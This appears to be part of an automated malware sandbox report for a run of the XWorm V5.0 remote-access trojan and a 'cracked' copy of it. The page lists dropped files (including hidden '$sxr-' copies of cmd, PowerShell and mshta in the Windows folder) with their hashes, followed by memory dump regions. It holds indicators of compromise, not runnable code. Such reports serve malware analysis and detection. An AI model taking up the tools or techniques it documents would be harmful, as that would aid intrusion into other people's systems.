SHA256
201527b47e05a9bc237cf03ea87b6e3d0a9c8467026b1bcabae83cfc4aeedd3e

SHA512
bdc33c7b66d09e67e012ddbd8b811b302ccbf71aa50774c90b2d8d440d987276ad8a2f2ae26961d38d32b852ca64269ba1b549b2845367880e96e85c852771e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
2KB

MD5
092c4d94505d420d0d647f78b7b4cf67

SHA1
d5c8444709e89874974e81ae0ff977691582c941

SHA256
9d0b9429cbaac911fea15ccdfa3b38076bfca568f138b7d5c9f22b6dfff62bd0

SHA512
c6bbcda130189b439cd34d7457b9bae83e9466ffe0ed5f0ac14844e17cf6768b04c89b65ddb4e15c9a02698929663d94045c52faedf911833def9ab9b57bc6f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
4KB

MD5
0642660c4b0a071d6359ffa83d310a13

SHA1
de2761c5b3bad35cd665e39ad5ca57dccdd578df

SHA256
f96b2fcedcae0284f6dacd6ff4635046708bf9d5fa8d6f53d5402c78ff727fb4

SHA512
3b90f2df302e60a08f65ccf4d61fe9865407b02ba8029b82fe98ee35f229d126efd6c9b6285c274e8bfd81979d7032678d05bf6fb063a886f47182fe5451b808

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
9KB

MD5
b40b9978bb789f691e834ef75bc07bee

SHA1
1757df6b999d0220c1062f44eef7df7ef608e7cc

SHA256
85ce79e37a3edaa369ef160014caeb0a18661aa68f380fd63c79c304654b1ff0

SHA512
cd2557555dc0f2ec72382d0ea826ede2f4cf518a0dce28e1808b657369815ece9cab2e61d9f4bf2d27e10bac67f76973ec93732b82658d3012bfe13ddf3bb6f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
9KB

MD5
cd2915b6c860ce4b9f5edeb960f53951

SHA1
0d80d6edc67cf4509d050452ff236fe2be100284

SHA256
60e685620a51758b5480a50e2c617260ad8fc3a53bec374dffd36101e1b0f54c

SHA512
32aca86b822bca7b62e36aca12a1ad3d328c896fb7e0edd61dc7fd9291e4125198c8143419834de4a67d0a189a9afc275c7bbe1c3c505dbb2630c85a8aae4f2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
c41d23721bad9255ed26b138f6b1cbba

SHA1
7020f0eb273dbeb42d472a25badb6557d9e02b15

SHA256
f95d74b34d5b887c67b66ae0510bf3faaa38381e04e84619631c9386c2459260

SHA512
b9437016a1a19f8408473488b0302d4adce5171878b802e8f79a46bae0def5d9d53c8aac2cc20a705fe51257e3cc0568fdd1f248afa9e5295bf17311c1f6eb9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
9KB

MD5
25b3cf308032f7efeead7724ee87e95d

SHA1
140da5a9c9b610858ee3def295074460ec236079

SHA256
fadc09f2806250063384630f0aa9dd1c9af671717f5d77db046dbbd0058aed93

SHA512
b2ce528578facfd72b434b98c1bb7a0efe4f7ac5c936b12c6b02b33d5c309cb22b61686e4b2b3e55a329c544d232d48d30f9d85a0d7601869dc52dccdc1fe206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
9KB

MD5
f36886a4fc6bd878e54668b64d2d0c4a

SHA1
50a6317bc928618a9accc853cc1cf4c270f9890e

SHA256
44271c21737794276e18d3cc441e2f6545bb6a3e38955747ff4836c5b10f7a9f

SHA512
604782953f740aaa8f7c7288aa2db3f0cbbb1827e59d9252bb9e361ea6996533ba5a298f50abafa81816b371e9d358fe89b674ad7aed827218d6e5bf83298010

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
10KB

MD5
ca11a2921e356303fb14247eed34e0c6

SHA1
5f69a132c8fb482e4c3927ed55ae835e4098ed83

SHA256
3aa1a2b8e69f8af6f5cd13805a3dc614d3b0cb8497cd7eeb9f0fe9705e22d440

SHA512
37d966ad6fc507d89d4333375966d6904ba8b3f12e1911b3bbefba0c2d03855e0454b73a0814b003570174e36d04d9c393ff81a9bfd4a3139391752b71a38fc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
9KB

MD5
8f2f16c9a8706fb56aed06ca5b958b73

SHA1
29e2e18cd5c6922b9cee14da1e79fc96a372162c

SHA256
c2b022a50d3190360d97126146df7db3090aa5cb8fee4a9a46239290c29b364b

SHA512
175592987f52e02d79673d2190294faa02defb3e99c8f5ee72363add4d1e4b7d0f020a3c818a32e77dc0d5b796bfe0005d81b7c6e870d090baa9070a5f19b64b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
8KB

MD5
05e8a1fe7bac0a201b5ae4e13ca2de06

SHA1
28b5c4a57cc97dc6ee2a40488edc977ee751ae82

SHA256
6cd880a27d48092bf981c248611a10ac4cccfc8bae3395da183160b6b7050fa0

SHA512
6b949604ef98a4f724e188dbac5df0d2c9ff4f1b5762c2cb19549003f6f063b5a4245894c54eaf7c5576217b7d4c4678f0f4af4590152006fda9d54b4118c7c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
9KB

MD5
607cb351eb2a336911452b5f9000ab94

SHA1
5d140f3cbe56a2cef55bf9f12c969bbe26c3c061

SHA256
c08f84a5f935b12666f6704f16131681a638647ba9c9e39bc55e8326a4c54c6b

SHA512
0f8f6c10ae4984a0aa04903ce35887bf51594e5641bb72e2f36b2f6c8859a0a095648119f59707f54b50c74134269430b58f2121bc4260510cd765f791e85bb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
9KB

MD5
e81bb17e272ed03b02970177b23b198b

SHA1
01c94b26e4dcacb95e70128934ac4ff96756687d

SHA256
16a82272bf637f35e66e77678887cb7001c48fe8541e48250b6a7262053d0c66

SHA512
6e1fec9bd361cd716d533a498ee9dda30af1a4f67e5c008c84a24bf03ff46a96e143ae598b39bbfbe007461a75f8cd6bcdcd215cfe63fa137911ae36e36c114c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
8KB

MD5
90745ba12ed4858f60cad1e677d04739

SHA1
0e8ea63730608b1b461734abdde6484ad5f77b17

SHA256
130e29cae91752caddeaeb143107db39612b12e00465a4a8fc7f418d1d4afbc5

SHA512
1c50a0262818a4aecca4688265bcd6b4e07b90f6f6b4d0e20d3b930782c25fc1c1238c9cf3e6281bbaebbc68fba62d07cdd5f5871afc06a55d0cdd8020fe0b91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize
72B

MD5
e3aada23881aae41a83049f8c6531af6

SHA1
a8ea32df70962c20e12cef45ab67240812bdfd97

SHA256
badd2c285fd879ca6496e4a5ddceec126988bc50be880f63527d3c84eab3000c

SHA512
dace52a15c15648adb218cae3b94f8bf1360a7e9a4e3ce42fbb0dc591aeb620e1907df03232d00513fd0e33cfca20ef5b5548308a11ebe4b69befbd13f97f7c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5a9b86.TMP
Filesize
48B

MD5
624347ba960d10dbaae821e76991f730

SHA1
995d3319e18da12f891ac859f3b172cb75ebc15c

SHA256
d38fad9157cbc905198c3ca9ddcdf78e4f4b84f1d8010c839d11e4d3a557268b

SHA512
d9ef8bd7859c6b1c7b039e1fce0ebe6887cff3cde701f873b177a06fb983f4af2cd986a88b1acc22560086d528c52835107b586069c35c1545d97147c363db40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
2KB

MD5
5de0e99eae014295eb397a6492e9cfda

SHA1
09dfbbe80d2bebab37214501e124beb5c8e05d07

SHA256
80eeb8d69c08833e36c2ac9d756a7b3650638f3fc39e02e8c7f8f645fc8ef027

SHA512
90eefc59f1912b052feea6514a9f92f34ff1a95d67783e5d4ef22c44b6317cc89cd5ca8c3d19bb554ca11eee5f8c65e2d842a8da9cc3521c44f2c6af7e3c4755

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
3KB

MD5
25c2ed8ba7c0b9f1c5f3387147be01e5

SHA1
873f67f429fa4ba51643042912015858b9765b6f

SHA256
e305aacb6af69df860140bfde9c9d4691a2d43cecbe6fd0b743e36e53f8b3d08

SHA512
ae9193124bfa1ddbf4210b7a95ff8be70241a5a31b96d376846dc6c4124098bad76046a35a42b53ecf058ce50a6a513909ffc28137713904b22b52e79d949758

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
3KB

MD5
55f3e6c7f6dd97ef8d39b0255d256c09

SHA1
681257bfd018e7c0e6eeae02f67a477fdbc048f9

SHA256
add5758aaf5fc4f7a708597e8958278ea413beb2b3dfca45769f641896eddfca

SHA512
3064912b7cc0167d65d47c7da3397bafa6a3b97e4c50904b808c4267aa2bc4f25d327e941af7488c9cc0b41b3e5b9ba897d2420a99dd4cfe443f39b4eb03f600

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
4KB

MD5
a7e1795abf78a4344fe419eaf73655bf

SHA1
a7881201916c37a626b03b9eea817d186fa42a1b

SHA256
d10c7aa3c37fb00f94e78f4a0de755ba9984aa17dc7352c397e5edffd42edaf8

SHA512
89ee4cc6db57268742c31b605aa1070aa823c5ef5478e91c4b7ec0a3814e72aaf7f5bb0d7c27b2ad80a9009a00cbaaa20f79f9c3987f27789bdc8aed70e047dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
4KB

MD5
865ff0cb2d0b84a9d7ca2a3cab7bde3d

SHA1
25b7f81740e6a8a70a4ab68c35fa60f8f7339bd2

SHA256
efea5594267dfd9407f57975fe421cc921fb815a6ef06cd23e1be0867549a5c7

SHA512
ac3dcb9bc87afaa005990c7e1f4fbc68a188f35fa6b1e36cf4b3ae0fcb2a0d3d07c303840aec919cccaca767fb576c1dd93b33fc55d8a7e663b7829935e958ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
3KB

MD5
47a1684d0812e0421282751aeea64706

SHA1
24b0261627bd7e3270e7485541a9f90acef845d6

SHA256
45430932684ac18b00ff56e2bf6fbdeea9491f3dbaede1d6bd8ee95329b238d7

SHA512
23681954773a93abb8428a0d3295dee772a1d2079bfff98451c5773dacd05c2a245e172c28473ce3d11d49a50ab8bc273b5ee4221490ee77f382609b016eaae5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
2KB

MD5
41ee12a0c0665dd412d496e724b9b97d

SHA1
d4a0695ffd32ec8f9a6f6ebc65d00db8cf688667

SHA256
9fa65e9406264347954f8869f1f5e2090a117a94e2b5f6a88c9ca0f93d5dc99f

SHA512
dfa1974be77ab9aaab7e82d437c4d53e77a95a3852141253ba98b404a209908dbc46b0dd8447dcbe040560e7d39dbb77231dd27c07fc2b0bc1f6e3cf1c005f53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
3KB

MD5
6f54da55773f4c2d69d0f2ca257d7775

SHA1
ce2ebbcd3befe4838f1ea36279dc3c029d851861

SHA256
16912f79cfa920371a6affc97b29c7cef839ee3be5830f40777293d85a18c6ac

SHA512
b19599335255fe5514ae597d4aa22c236f7084f90695f16155c15b64904215969343a1a131bef1768d671c0dc97672543c1c96f276f6d43c63ea5434a19ac5d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
Filesize
3KB

MD5
3e0d23db398240a8634ad5e51fa85cc1

SHA1
678bb29b97294c8eff8e11dfddbae939a67f5de6

SHA256
297c41067440bcee55012873848507a58a7462551419a8168a8ff569bbcd87b2

SHA512
68e63c64f1b09186ce92841e77c84aca6b6215848e515baeed4c3803b72071c91ba65f54a548d25e93c7350c6dcd01477b9c3154674e43dc34c296605ac95afd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe594368.TMP
Filesize
1KB

MD5
646c380a3bb8335d5a4bee4ea21c3d66

SHA1
0c2dbbe06605af50ff116639c177e6a5ed09448a

SHA256
66324ec9edcf94a649bf7b81fe33cb383b8e4c83069812730e0358dc336ad380

SHA512
e7260a2c09ae5ec6b31abf91af3bc958d5a74e6903e7a34e05ccd6cffdc0276b7f4c2bb8e7e9ed35ee4af0403554cba574a5b4701b46cf1c24bd8e053bc98644

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
8b1b2ef910fab412d306407809d2eadd

SHA1
a8351618ea4519f3c028d85e80604f7dbd4d2486

SHA256
6c64da7cd90b0acf7669bfca44ab4dad9f002cae69df878b942ccf6c17a3e820

SHA512
b5e3add775f05689e7dadfdea450c9ee81ad7bad07acc513627acebee524eea69f9a26668aa30a7142c36a7df19efa7d3c8a3405b39bb252d504ce82454aa6df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
fce05213003b586ee0ca0835464ed82c

SHA1
cea63f5817e28935a477d8d97f685537f7d77150

SHA256
e2b78754d352f427c6c6bb2db112d7dece9ec8bc53cb2800ead4a12e58ad73ae

SHA512
72c471c08892ae54fc4215b1f7ab8b2a71dfc3a3cc04a15f805e7a5af2c940782bf14576555205aaa50468cb5482a422bddd12cf586ccdcb8ff6700d4a11502d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
62KB

MD5
e566632d8956997225be604d026c9b39

SHA1
94a9aade75fffc63ed71404b630eca41d3ce130e

SHA256
b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

SHA512
f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zE07F520A8\XWorm-V5.0\Icons\icon (15).ico
Filesize
361KB

MD5
e3143e8c70427a56dac73a808cba0c79

SHA1
63556c7ad9e778d5bd9092f834b5cc751e419d16

SHA256
b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188

SHA512
74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\CE8806DA1EF0F1BB553DFF4FC5E9FCCD\CE8806DA1EF0F1BB553DFF4FC5E9FCCD.dll
Filesize
112KB

MD5
a239b7cac8be034a23e7e231d3bcc6df

SHA1
ae3c239a17c2b4b4d2fba1ec862cf9644bf1346d

SHA256
063099408fd5fb10a7ea408a50b7fb5da1c36accc03b9b31c933df54385d32b8

SHA512
c79a2b08f7e95d49a588b1f41368f0dd8d4cd431ad3403301e4d30826d3df0907d01b28ef83116ad6f035218f06dbdf63a0f4f2f9130bba1b0b7e58f9fc67524

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cjdqgqzj.ycm.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize
11KB

MD5
2e1900ae4ac5fc19f5af9e13519f200d

SHA1
0b0cef610338223ae87c3e482f6e45bdc6bb1255

SHA256
6c75c959d394566ce5eac049b363d7eb1af50ed2f77140f03360a28376357a08

SHA512
7ba5815e5a3b3b26ced0499c1e9faf73157c52054f2b081ebef2622da9a353664736887fc0b981ee43e6e1e63536f28b52bd933d45e64a6564fb28e55cbcfecd

Download Submit
C:\Users\Admin\Desktop\XWorm-V5.0\GeoIP.dat
Filesize
1.2MB

MD5
8ef41798df108ce9bd41382c9721b1c9

SHA1
1e6227635a12039f4d380531b032bf773f0e6de0

SHA256
bc07ff22d4ee0b6fafcc12482ecf2981c172a672194c647cedf9b4d215ad9740

SHA512
4c62af04d4a141b94eb3e1b0dbf3669cb53fe9b942072ed7bea6a848d87d8994cff5a5f639ab70f424eb79a4b7adabdde4da6d2f02f995bd8d55db23ce99f01b

Download Submit
C:\Users\Admin\Desktop\XWorm-V5.0\Guna.UI2.dll
Filesize
1.9MB

MD5
bcc0fe2b28edd2da651388f84599059b

SHA1
44d7756708aafa08730ca9dbdc01091790940a4f

SHA256
c6264665a882e73eb2262a74fea2c29b1921a9af33180126325fb67a851310ef

SHA512
3bfc3d27c095dde988f779021d0479c8c1de80a404454813c6cae663e3fe63dc636bffa7de1094e18594c9d608fa7420a0651509544722f2a00288f0b7719cc8

Download Submit
C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe
Filesize
10.4MB

MD5
227494b22a4ee99f48a269c362fd5f19

SHA1
d32d08cf93d7f9450aee7e1e6c39d9d83b9a35c9

SHA256
7471ff7818da2e044caf5bd89725b6283ed0304453c18a0490d6341f3a010ca2

SHA512
71070e6b8042fa262ce12721e6c09104aec0a61ac0d6022f59f838077109b9476a5c1f8409242d93888eff6d36f0ee76337481fefe6f05e0f1243efbf350bee0

Download Submit
C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe.config
Filesize
183B

MD5
66f09a3993dcae94acfe39d45b553f58

SHA1
9d09f8e22d464f7021d7f713269b8169aed98682

SHA256
7ea08548c23bd7fd7c75ca720ac5a0e8ca94cb51d06cd45ebf5f412e4bbdd7d7

SHA512
c8ea53ab187a720080bd8d879704e035f7e632afe1ee93e7637fad6bb7e40d33a5fe7e5c3d69134209487d225e72d8d944a43a28dc32922e946023e89abc93ed

Download Submit
C:\Users\Admin\Downloads\XWorm-V5.0.rar
Filesize
28.8MB

MD5
f778fc725ed79c15d3ad889e7a33bea8

SHA1
6dfce5a46e080fb2436b09a5ed68b98b4c28c17d

SHA256
c2a1b97d657542e949496bc96e5a6c4e0beb101a629e7591519d0cb7e906dbfa

SHA512
ecb5365ae67963d1d246851a852fda53d7ed100e99377d340124b432a3d502044d4ae3abf2e67f7b1224dd08e42e45906d173fcf0e667ec1f052102a4196745a

Download Submit
C:\Users\Admin\Downloads\XWorm-V5.0.rar:Zone.Identifier
Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\XWorm-V5.6-Cracked-main.zip
Filesize
10.7MB

MD5
a7a9365b4303cc26d81edf194af64c72

SHA1
8f9d394c3248e3ec153eeaea7c8f3a7a611cc7d2

SHA256
edb12c68df069f50d745fe2b02f31f623c69605d36278b737c801ccc46088db0

SHA512
87ec06f8b095e9e2c9b2e475b8137bd3beeb084e59a7e2d184a1609b3408baf572d8297b39431f20c6010ba938ff38c17a4c7f4967ec56b24052b3870fcb0e5f

Download Submit
C:\Windows\$sxr-cmd.exe
Filesize
324KB

MD5
c5db7b712f280c3ae4f731ad7d5ea171

SHA1
e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

SHA256
f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

SHA512
bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Download Submit
C:\Windows\$sxr-mshta.exe
Filesize
32KB

MD5
356e04e106f6987a19938df67dea0b76

SHA1
f2fd7cde5f97427e497dfb07b7f682149dc896fb

SHA256
4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

SHA512
df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
\??\pipe\LOCAL\crashpad_2160_KCVXDCQFUWURDSDV
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1480-1727-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/1480-1715-0x000002016E140000-0x000002016E150000-memory.dmp

Filesize
64KB

Download
memory/1480-1731-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

Filesize
10.8MB

Download
memory/1480-1730-0x00007FF618E50000-0x00007FF618EBE000-memory.dmp

Filesize
440KB

Download
memory/1480-1729-0x000002017EF20000-0x000002017F608000-memory.dmp

Filesize
6.9MB

Download
memory/1480-1728-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/1480-1702-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

Filesize
10.8MB

Download
memory/1480-1725-0x000002017E870000-0x000002017EF16000-memory.dmp

Filesize
6.6MB

Download
memory/1480-1703-0x000002016E140000-0x000002016E150000-memory.dmp

Filesize
64KB

Download
memory/1480-1732-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/1480-1705-0x000002016E140000-0x000002016E150000-memory.dmp

Filesize
64KB

Download
memory/2152-390-0x000001F1A6430000-0x000001F1A6440000-memory.dmp

Filesize
64KB

Download
memory/2152-373-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

Filesize
10.8MB

Download
memory/2152-391-0x000001F1A6440000-0x000001F1A6FF6000-memory.dmp

Filesize
11.7MB

Download
memory/2152-372-0x000001F18AC10000-0x000001F18B682000-memory.dmp

Filesize
10.4MB

Download
memory/2152-393-0x000001F1A7360000-0x000001F1A7554000-memory.dmp

Filesize
2.0MB

Download
memory/2152-395-0x000001F1A6430000-0x000001F1A6440000-memory.dmp

Filesize
64KB

Download
memory/2152-394-0x000001F1A6430000-0x000001F1A6440000-memory.dmp

Filesize
64KB

Download
memory/2152-406-0x000001F1A6430000-0x000001F1A6440000-memory.dmp

Filesize
64KB

Download
memory/2152-414-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

Filesize
10.8MB

Download
memory/3920-1557-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/3920-1565-0x000001FA7C710000-0x000001FA7C718000-memory.dmp

Filesize
32KB

Download
memory/3920-1566-0x000001FA7A980000-0x000001FA7A986000-memory.dmp

Filesize
24KB

Download
memory/3920-1567-0x000001FA7C720000-0x000001FA7C75E000-memory.dmp

Filesize
248KB

Download
memory/3920-1568-0x000001FA7C760000-0x000001FA7D38C000-memory.dmp

Filesize
12.2MB

Download
memory/3920-1601-0x000001FA7D390000-0x000001FA7D442000-memory.dmp

Filesize
712KB

Download
memory/3920-1612-0x000001FA7D440000-0x000001FA7D476000-memory.dmp

Filesize
216KB

Download
memory/3920-1621-0x000001FA7D480000-0x000001FA7D4D8000-memory.dmp

Filesize
352KB

Download
memory/3920-1640-0x000001FA7D8E0000-0x000001FA7D90E000-memory.dmp

Filesize
184KB

Download
memory/3920-1643-0x00007FF730D80000-0x00007FF730DEE000-memory.dmp

Filesize
440KB

Download
memory/3920-1644-0x000001FA7D910000-0x000001FA7D918000-memory.dmp

Filesize
32KB

Download
memory/3920-1645-0x0000000180000000-0x0000000180007000-memory.dmp

Filesize
28KB

Download
memory/3920-1564-0x000001FA621B0000-0x000001FA621B6000-memory.dmp

Filesize
24KB

Download
memory/3920-1657-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/3920-1563-0x000001FA7C6B0000-0x000001FA7C708000-memory.dmp

Filesize
352KB

Download
memory/3920-1673-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/3920-1674-0x00007FF996E48000-0x00007FF996E49000-memory.dmp

Filesize
4KB

Download
memory/3920-1562-0x000001FA7C650000-0x000001FA7C6AE000-memory.dmp

Filesize
376KB

Download
memory/3920-1693-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/3920-1561-0x000001FA7A990000-0x000001FA7A996000-memory.dmp

Filesize
24KB

Download
memory/3920-1560-0x000001FA7A960000-0x000001FA7A982000-memory.dmp

Filesize
136KB

Download
memory/3920-1559-0x000001FA7C550000-0x000001FA7C64C000-memory.dmp

Filesize
1008KB

Download
memory/3920-1558-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/3920-1556-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/3920-1704-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/3920-1555-0x00007FF9BA6C0000-0x00007FF9BA77D000-memory.dmp

Filesize
756KB

Download
memory/3920-1553-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/3920-1554-0x000001FA7A490000-0x000001FA7A4A0000-memory.dmp

Filesize
64KB

Download
memory/3920-1552-0x000001FA7B690000-0x000001FA7C17C000-memory.dmp

Filesize
10.9MB

Download
memory/3920-1551-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/3920-1550-0x000001FA7A490000-0x000001FA7A4A0000-memory.dmp

Filesize
64KB

Download
memory/3920-1549-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

Filesize
2.0MB

Download
memory/3920-1548-0x000001FA7A490000-0x000001FA7A4A0000-memory.dmp

Filesize
64KB

Download
memory/3920-1547-0x000001FA7ABE0000-0x000001FA7B68C000-memory.dmp

Filesize
10.7MB

Download
memory/3920-1546-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

Filesize
10.8MB

Download
memory/3920-1544-0x000001FA7A9A0000-0x000001FA7A9E6000-memory.dmp

Filesize
280KB

Download
memory/3920-1543-0x000001FA7A490000-0x000001FA7A4A0000-memory.dmp

Filesize
64KB

Download
memory/3920-1542-0x000001FA7A490000-0x000001FA7A4A0000-memory.dmp

Filesize
64KB

Download
memory/3920-1541-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

Filesize
10.8MB

Download
memory/3920-1540-0x000001FA7A450000-0x000001FA7A472000-memory.dmp

Filesize
136KB

Download